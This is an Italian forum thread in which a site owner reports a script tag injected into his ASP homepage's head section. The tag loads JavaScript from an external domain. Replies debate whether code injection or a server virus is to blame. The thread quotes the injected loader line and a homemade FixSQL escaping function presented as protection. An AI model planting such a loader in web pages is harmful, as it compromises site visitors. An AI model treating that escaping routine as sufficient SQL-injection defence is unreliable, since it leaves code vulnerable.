File ASP hackerato

[Roby140569]

Mi sono trovato la homepage di un sito scritto in ASP hackerata: all'interno della sezione head ho trovato questo tag.

codice:

<script type='text/javascript' src='//pl15242721.passeura.com/19/c3/36/19c3366c50f8e04756d58a7a8a69c199.js'></script>

Il sito è in ambiente cloud, S.O. Windows (non so quale versione), viene usato un db MySQL ed è online dal 2008 (ai tempi era su un altro server).
Negli anni è stato più volte aggiornato e attualmente le pagine usano il framework Bootstrap versione 3. Nel sito c'è un'area riservata per gestirne i contenuti.

Mi chiedevo se un problema di questo genere può essere causato dal fatto che è stata sfruttata una falla nella sicurezza del mio codice o se inserimenti di codice nei file è un qualcosa che può essere fatto solo se viene bucato il server.

In sostanza, vorrei capire se impiegare del tempo nella ricerca di problemi nel codice (non saprei, in realtà, cosa cercare), o se passare la palla a quelli che gestiscono il server e fargli fare le verifiche del caso, oltre a controllare che il sistema operativo e mysql siano aggiornati.

[dwb]

Potrebbe trattarsi di code injection. I malintenzionati potrebbero aver sfruttato qualche falla nel codice: spesso le vulnerabilità risiedono nel mancato o errato controllo dell'input da parte dell'utente, sia che i dati provengano da un form, che attraverso la querystring.

[optime]

o anche un virus sul server del tuo hoster che inietta il codice in tutte le pagine asp (che non sono altro che dei file di testo...)

[Roby140569]

Nelle querystring c'è sempre un controllo di questo tipo:

codice:

Function FixSQL(stringa)
 stringa = Replace(stringa, "'", "''")
 stringa = Replace(stringa, "%", "[%]")
 stringa = Replace(stringa, "[", "[[]")
 stringa = Replace(stringa, "]", "[]]")
 stringa = Replace(stringa, "_", "[_]")
 stringa = Replace(stringa, "#", "[#]")
 FixSQL = stringa
End function

C'è poi HtmlEncode per rendere innoqui eventuali pezzi di codice inseriti nella pagina.
Nei form c'è il captcha di Google.

Cos'altro si può fare sul codice?

[Roby140569]

o anche un virus sul server del tuo hoster che inietta il codice in tutte le pagine asp (che non sono altro che dei file di testo...)

OK, quindi, ricontrollo tutto il mio codice e poi passo la palla a quelli che gestiscono il server (abbiamo un server dedicato).

[Vincent.Zeno]

controlla tutto quello che arriva via post e via get
di certo il problema è la sicurezza nella composizione delle query e/o nell'autenticazione dell'utente

hai parlato di "file asp" hackerati. ma questo è possibile (anche se poco probabile) solo se hanno permessi di scrittura.
da quello che racconti è "il sito" ad essere violato, non il file asp.

[optime]

da quello che racconti è "il sito" ad essere violato, non il file asp.

veramente ha detto il contrario

parlo di virus sul server perché ho avuto la stessa esperienza su un hosting condiviso

[Vincent.Zeno]

a parte l'ipotesi del virus...
si, ha detto il contrario. ma non ha specificato di averlo trovato nel codice del file asp. ha detto solo di averlo trovato nell'homepage.
non vedendo noi il codice la doppia/tripla verifica si rende necessaria, concordi?

[optime]

il codice l'ha postato

[Roby140569]

a parte l'ipotesi del virus...
si, ha detto il contrario. ma non ha specificato di averlo trovato nel codice del file asp. ha detto solo di averlo trovato nell'homepage.
non vedendo noi il codice la doppia/tripla verifica si rende necessaria, concordi?

Ho trovato nel codice del file asp, subito prima di </head>, il codice che ho postato.
Così è più chiaro?